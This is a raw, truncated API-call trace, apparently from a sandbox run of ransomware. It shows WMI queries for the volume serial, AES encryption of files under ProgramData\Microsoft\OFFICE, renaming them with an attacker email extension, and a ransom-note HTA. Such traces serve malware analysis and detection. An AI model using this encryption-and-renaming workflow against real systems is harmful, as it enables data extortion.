WbemLocator:IUnknown:Release (This=0xb5bd84) returned 0x3 [0206.350] WbemLocator:IUnknown:Release (This=0xb5bd84) returned 0x2 [0206.350] WbemDefPath:IWbemPath:GetText (in: This=0x6030b00, lFlags=2, puBuffLength=0x691f2d0*=0x0, pszText=0x0 | out: puBuffLength=0x691f2d0*=0x20, pszText=0x0) returned 0x0 [0206.350] WbemDefPath:IWbemPath:GetText (in: This=0x6030b00, lFlags=2, puBuffLength=0x691f2d0*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x691f2d0*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0206.351] IWbemServices:GetObject (in: This=0x603368c, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x691f284*=0x0, ppCallResult=0x0 | out: ppObject=0x691f284*=0x6028180, ppCallResult=0x0) returned 0x0 [0206.459] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60305c0, puCount=0x691f284 | out: puCount=0x691f284*=0x2) returned 0x0 [0206.459] WbemDefPath:IWbemPath:GetText (in: This=0x60305c0, lFlags=4, puBuffLength=0x691f280*=0x0, pszText=0x0 | out: puBuffLength=0x691f280*=0xf, pszText=0x0) returned 0x0 [0206.459] WbemDefPath:IWbemPath:GetText (in: This=0x60305c0, lFlags=4, puBuffLength=0x691f280*=0xf, pszText="00000000000000" | out: puBuffLength=0x691f280*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0206.459] IWbemClassObject:Get (in: This=0x6028180, wszName="VolumeSerialNumber", lFlags=0, pVal=0x691f280*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3685564*=0, plFlavor=0x3685568*=0 | out: pVal=0x691f280*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3685564*=8, plFlavor=0x3685568*=0) returned 0x0 [0206.459] SysStringByteLen (bstr="9C354B42") returned 0x10 [0206.459] SysStringByteLen (bstr="9C354B42") returned 0x10 [0206.459] IWbemClassObject:Get (in: This=0x6028180, wszName="VolumeSerialNumber", lFlags=0, pVal=0x691f288*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3685564*=8, plFlavor=0x3685568*=0 | out: pVal=0x691f288*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3685564*=8, plFlavor=0x3685568*=0) returned 0x0 [0206.459] SysStringByteLen (bstr="9C354B42") returned 0x10 [0206.459] SysStringByteLen (bstr="9C354B42") returned 0x10 [0206.459] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico", nBufferLength=0x105, lpBuffer=0x691ee88, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico", lpFilePart=0x0) returned 0x36 [0206.459] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x691ee88, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x59 [0206.459] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f2e8) returned 1 [0206.460] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico" (normalized: "c:\\programdata\\microsoft\\office\\documentrepository.ico"), fInfoLevelId=0x0, lpFileInformation=0x691f364 | out: lpFileInformation=0x691f364*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabeeea00, ftCreationTime.dwHighDateTime=0x1c63848, ftLastAccessTime.dwLowDateTime=0x51e19d30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3460f1e0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0206.460] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f2e4) returned 1 [0206.460] MoveFileW (lpExistingFileName="C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico" (normalized: "c:\\programdata\\microsoft\\office\\documentrepository.ico"), lpNewFileName="C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\programdata\\microsoft\\office\\documentrepository.ico.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0206.461] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico", nBufferLength=0x105, lpBuffer=0x691eea0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico", lpFilePart=0x0) returned 0x31 [0206.461] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x691eea8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\info-decrypt.hta", lpFilePart=0x0) returned 0x30 [0206.461] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f308) returned 1 [0206.461] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\info-decrypt.hta" (normalized: "c:\\programdata\\microsoft\\office\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x691f384 | out: lpFileInformation=0x691f384*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x32cea980, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x32cea980, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x32cea980, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0206.461] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f304) returned 1 [0206.461] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico", nBufferLength=0x105, lpBuffer=0x691eea8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico", lpFilePart=0x0) returned 0x31 [0206.461] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f354) returned 1 [0206.461] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico" (normalized: "c:\\programdata\\microsoft\\office\\mysharepoints.ico"), fInfoLevelId=0x0, lpFileInformation=0x3685a54 | out: lpFileInformation=0x3685a54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2bfbd800, ftCreationTime.dwHighDateTime=0x1c9facb, ftLastAccessTime.dwLowDateTime=0x6a3248d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2bfbd800, ftLastWriteTime.dwHighDateTime=0x1c9facb, nFileSizeHigh=0x0, nFileSizeLow=0x5532e)) returned 1 [0206.462] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f350) returned 1 [0206.462] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico", nBufferLength=0x105, lpBuffer=0x691ed94, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico", lpFilePart=0x0) returned 0x31 [0206.462] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f288) returned 1 [0206.462] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico" (normalized: "c:\\programdata\\microsoft\\office\\mysharepoints.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x5a0 [0206.462] GetFileType (hFile=0x5a0) returned 0x1 [0206.462] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f284) returned 1 [0206.462] GetFileType (hFile=0x5a0) returned 0x1 [0206.462] GetFileSize (in: hFile=0x5a0, lpFileSizeHigh=0x691f390 | out: lpFileSizeHigh=0x691f390*=0x0) returned 0x5532e [0206.463] ReadFile (in: hFile=0x5a0, lpBuffer=0x8c54fb0, nNumberOfBytesToRead=0x5532e, lpNumberOfBytesRead=0x691f33c, lpOverlapped=0x0 | out: lpBuffer=0x8c54fb0*, lpNumberOfBytesRead=0x691f33c*=0x5532e, lpOverlapped=0x0) returned 1 [0206.474] CloseHandle (hObject=0x5a0) returned 1 [0206.475] CryptAcquireContextW (in: phProv=0x691f2dc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x691f2dc*=0xbe0470) returned 1 [0206.476] CryptGenRandom (in: hProv=0xbe0470, dwLen=0x10, pbBuffer=0x36862dc | out: pbBuffer=0x36862dc) returned 1 [0206.645] CryptImportKey (in: hProv=0xbe0470, pbData=0x37906c0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x691f2ac | out: phKey=0x691f2ac*=0xb7fb10) returned 1 [0206.645] CryptContextAddRef (hProv=0xbe0470, pdwReserved=0x0, dwFlags=0x0) returned 1 [0206.645] CryptContextAddRef (hProv=0xbe0470, pdwReserved=0x0, dwFlags=0x0) returned 1 [0206.645] CryptDuplicateKey (in: hKey=0xb7fb10, pdwReserved=0x0, dwFlags=0x0, phKey=0x691f29c | out: phKey=0x691f29c*=0xb7f4d0) returned 1 [0206.645] CryptContextAddRef (hProv=0xbe0470, pdwReserved=0x0, dwFlags=0x0) returned 1 [0206.646] CryptSetKeyParam (hKey=0xb7f4d0, dwParam=0x4, pbData=0x37907a0*=0x1, dwFlags=0x0) returned 1 [0206.646] CryptSetKeyParam (hKey=0xb7f4d0, dwParam=0x1, pbData=0x379076c, dwFlags=0x0) returned 1 [0206.647] CryptEncrypt (in: hKey=0xb7f4d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xb17c178*, pdwDataLen=0x691f308*=0x55330, dwBufLen=0x55330 | out: pbData=0xb17c178*, pdwDataLen=0x691f308*=0x55330) returned 1 [0206.651] CryptEncrypt (in: hKey=0xb7f4d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37907c8*, pdwDataLen=0x691f310*=0x0, dwBufLen=0x10 | out: pbData=0x37907c8*, pdwDataLen=0x691f310*=0x10) returned 1 [0206.653] CryptDestroyKey (hKey=0xb7fb10) returned 1 [0206.653] CryptReleaseContext (hProv=0xbe0470, dwFlags=0x0) returned 1 [0206.653] CryptReleaseContext (hProv=0xbe0470, dwFlags=0x0) returned 1 [0206.653] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico", nBufferLength=0x105, lpBuffer=0x691ed80, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico", lpFilePart=0x0) returned 0x31 [0206.654] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f274) returned 1 [0206.654] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico" (normalized: "c:\\programdata\\microsoft\\office\\mysharepoints.ico"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x5a0 [0206.654] GetFileType (hFile=0x5a0) returned 0x1 [0206.654] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f270) returned 1 [0206.654] GetFileType (hFile=0x5a0) returned 0x1 [0206.654] WriteFile (in: hFile=0x5a0, lpBuffer=0x3790dcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x691f304, lpOverlapped=0x0 | out: lpBuffer=0x3790dcc*, lpNumberOfBytesWritten=0x691f304*=0x20, lpOverlapped=0x0) returned 1 [0206.657] CloseHandle (hObject=0x5a0) returned 1 [0206.657] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0206.657] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0206.657] CoTaskMemFree (pv=0xbed438) [0206.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x691ed68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0206.658] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691f2b0 | out: ppv=0x691f2b0*=0xb51e34) returned 0x0 [0206.658] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x691f2a8 | out: pAptType=0x691f2a8*=1) returned 0x0 [0206.658] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x691f2ac | out: ppvObject=0x691f2ac*=0x0) returned 0x80004002 [0206.658] IUnknown:Release (This=0xb51e34) returned 0x1 [0206.659] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691ec18 | out: ppv=0x691ec18*=0x6027410) returned 0x0 [0206.659] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027410, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x691ee30 | out: ppvObject=0x691ee30*=0x0) returned 0x80004002 [0206.659] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027410, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ee44 | out: ppvObject=0x691ee44*=0x6029ce0) returned 0x0 [0206.659] WbemDefPath:IUnknown:Release (This=0x6027410) returned 0x0 [0206.659] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ce0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ea64 | out: ppvObject=0x691ea64*=0x6029ce0) returned 0x0 [0206.659] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ce0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x691ea20 | out: ppvObject=0x691ea20*=0x0) returned 0x80004002 [0206.660] WbemDefPath:IUnknown:AddRef (This=0x6029ce0) returned 0x3 [0206.660] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ce0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x691e37c | out: ppvObject=0x691e37c*=0x0) returned 0x80004002 [0206.660] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ce0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x691e32c | out: ppvObject=0x691e32c*=0x0) returned 0x80004002 [0206.660] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ce0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e338 | out: ppvObject=0x691e338*=0xbdf070) returned 0x0 [0206.660] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbdf070, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x691e340 | out: pCid=0x691e340*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0206.660] WbemDefPath:IUnknown:Release (This=0xbdf070) returned 0x3 [0206.660] CoGetContextToken (in: pToken=0x691e398 | out: pToken=0x691e398) returned 0x0 [0206.660] CoGetContextToken (in: pToken=0x691e7a0 | out: pToken=0x691e7a0) returned 0x0 [0206.660] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ce0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e830 | out: ppvObject=0x691e830*=0x0) returned 0x80004002 [0206.660] WbemDefPath:IUnknown:Release (This=0x6029ce0) returned 0x2 [0206.660] WbemDefPath:IUnknown:Release (This=0x6029ce0) returned 0x1 [0206.660] CoGetContextToken (in: pToken=0x691f128 | out: pToken=0x691f128) returned 0x0 [0206.660] CoGetContextToken (in: pToken=0x691f088 | out: pToken=0x691f088) returned 0x0 [0206.660] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ce0, riid=0x691f158*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x691f154 | out: ppvObject=0x691f154*=0x6029ce0) returned 0x0 [0206.660] WbemDefPath:IUnknown:AddRef (This=0x6029ce0) returned 0x3 [0206.660] WbemDefPath:IUnknown:Release (This=0x6029ce0) returned 0x2 [0206.660] WbemDefPath:IWbemPath:SetText (This=0x6029ce0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0206.660] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029ce0, puCount=0x691f2dc | out: puCount=0x691f2dc*=0x0) returned 0x0 [0206.660] WbemDefPath:IWbemPath:GetText (in: This=0x6029ce0, lFlags=2, puBuffLength=0x691f2d8*=0x0, pszText=0x0 | out: puBuffLength=0x691f2d8*=0x20, pszText=0x0) returned 0x0 [0206.661] WbemDefPath:IWbemPath:GetText (in: This=0x6029ce0, lFlags=2, puBuffLength=0x691f2d8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x691f2d8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0206.661] WbemDefPath:IWbemPath:GetInfo (in: This=0x6029ce0, uRequestedInfo=0x0, puResponse=0x691f2e4 | out: puResponse=0x691f2e4*=0xc19) returned 0x0 [0206.661] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029ce0, puCount=0x691f2dc | out: puCount=0x691f2dc*=0x0) returned 0x0 [0206.661] WbemDefPath:IWbemPath:GetInfo (in: This=0x6029ce0, uRequestedInfo=0x0, puResponse=0x691f2e4 | out: puResponse=0x691f2e4*=0xc19) returned 0x0 [0206.661] WbemDefPath:IWbemPath:GetInfo (in: This=0x6029ce0, uRequestedInfo=0x0, puResponse=0x691f2e4 | out: puResponse=0x691f2e4*=0xc19) returned 0x0 [0206.661] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029ce0, puCount=0x691f25c | out: puCount=0x691f25c*=0x0) returned 0x0 [0206.661] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x691f248 | out: puCount=0x691f248*=0x2) returned 0x0 [0206.661] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x691f244*=0x0, pszText=0x0 | out: puBuffLength=0x691f244*=0xf, pszText=0x0) returned 0x0 [0206.661] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x691f244*=0xf, pszText="00000000000000" | out: puBuffLength=0x691f244*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0206.661] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691f1f8 | out: ppv=0x691f1f8*=0xb51e34) returned 0x0 [0206.661] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x691f1f0 | out: pAptType=0x691f1f0*=1) returned 0x0 [0206.661] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x691f1f4 | out: ppvObject=0x691f1f4*=0x0) returned 0x80004002 [0206.661] IUnknown:Release (This=0xb51e34) returned 0x1 [0206.662] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691eb60 | out: ppv=0x691eb60*=0x6027420) returned 0x0 [0206.662] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027420, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x691ed78 | out: ppvObject=0x691ed78*=0x0) returned 0x80004002 [0206.662] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027420, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ed8c | out: ppvObject=0x691ed8c*=0x6029ff0) returned 0x0 [0206.662] WbemDefPath:IUnknown:Release (This=0x6027420) returned 0x0 [0206.662] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ff0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e9ac | out: ppvObject=0x691e9ac*=0x6029ff0) returned 0x0 [0206.662] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ff0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x691e968 | out: ppvObject=0x691e968*=0x0) returned 0x80004002 [0206.663] WbemDefPath:IUnknown:AddRef (This=0x6029ff0) returned 0x3 [0206.663] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ff0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x691e2c4 | out: ppvObject=0x691e2c4*=0x0) returned 0x80004002 [0206.663] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ff0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x691e274 | out: ppvObject=0x691e274*=0x0) returned 0x80004002 [0206.663] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ff0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e280 | out: ppvObject=0x691e280*=0xbdf1d0) returned 0x0 [0206.663] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbdf1d0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x691e288 | out: pCid=0x691e288*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0206.663] WbemDefPath:IUnknown:Release (This=0xbdf1d0) returned 0x3 [0206.663] CoGetContextToken (in: pToken=0x691e2e0 | out: pToken=0x691e2e0) returned 0x0 [0206.663] CoGetContextToken (in: pToken=0x691e6e8 | out: pToken=0x691e6e8) returned 0x0 [0206.663] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ff0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e778 | out: ppvObject=0x691e778*=0x0) returned 0x80004002 [0206.663] WbemDefPath:IUnknown:Release (This=0x6029ff0) returned 0x2 [0206.663] WbemDefPath:IUnknown:Release (This=0x6029ff0) returned 0x1 [0206.663] CoGetContextToken (in: pToken=0x691f070 | out: pToken=0x691f070) returned 0x0 [0206.663] CoGetContextToken (in: pToken=0x691efd0 | out: pToken=0x691efd0) returned 0x0 [0206.663] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ff0, riid=0x691f0a0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x691f09c | out: ppvObject=0x691f09c*=0x6029ff0) returned 0x0 [0206.663] WbemDefPath:IUnknown:AddRef (This=0x6029ff0) returned 0x3 [0206.663] WbemDefPath:IUnknown:Release (This=0x6029ff0) returned 0x2 [0206.663] WbemDefPath:IWbemPath:SetText (This=0x6029ff0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0206.663] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029ff0, puCount=0x691f220 | out: puCount=0x691f220*=0x2) returned 0x0 [0206.663] WbemDefPath:IWbemPath:GetText (in: This=0x6029ff0, lFlags=4, puBuffLength=0x691f21c*=0x0, pszText=0x0 | out: puBuffLength=0x691f21c*=0xf, pszText=0x0) returned 0x0 [0206.664] WbemDefPath:IWbemPath:GetText (in: This=0x6029ff0, lFlags=4, puBuffLength=0x691f21c*=0xf, pszText="00000000000000" | out: puBuffLength=0x691f21c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0206.664] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691f220 | out: ppv=0x691f220*=0xb51e34) returned 0x0 [0206.664] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x691f218 | out: pAptType=0x691f218*=1) returned 0x0 [0206.664] IUnknown:QueryInterface (in: This=0xb51e34, 